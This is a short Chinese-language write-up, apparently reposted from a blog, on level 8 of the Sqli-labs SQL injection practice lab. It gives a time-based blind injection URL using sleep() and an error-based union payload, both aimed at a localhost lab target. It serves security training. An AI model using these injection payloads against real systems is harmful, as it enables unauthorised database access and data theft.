Sqli-labs less 8

匿名 (未验证) 提交于 2019-12-03 00:34:01

经过简单的测试,我们发现 'or 1=1--+返回正常,那么我们就基本知道应该怎么使用了,参考less5.这里简单的进行一个示例:

http://127.0.0.1/sqllib/Less-8/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+


这里用的延时注入,当然了我们使用布尔类型的注入也是可以的,那么和第五关有什么区别呢?

第八关我们直接从源代码中可以看到

这里将mysql报错的语句进行了注释,那么这一关报错注入就不行了。

http://127.0.0.1/sqllib/Less-8/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

如果报错注入可以使用的话是可以直接返回user()的,但是这里没有返回。

其他的payload参考less5直接进行注入,这里就不一一的演示了。

转自:lcarmy
转载请标明出处:Sqli-labs less 8
文章来源: Sqli-labs less 8
标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!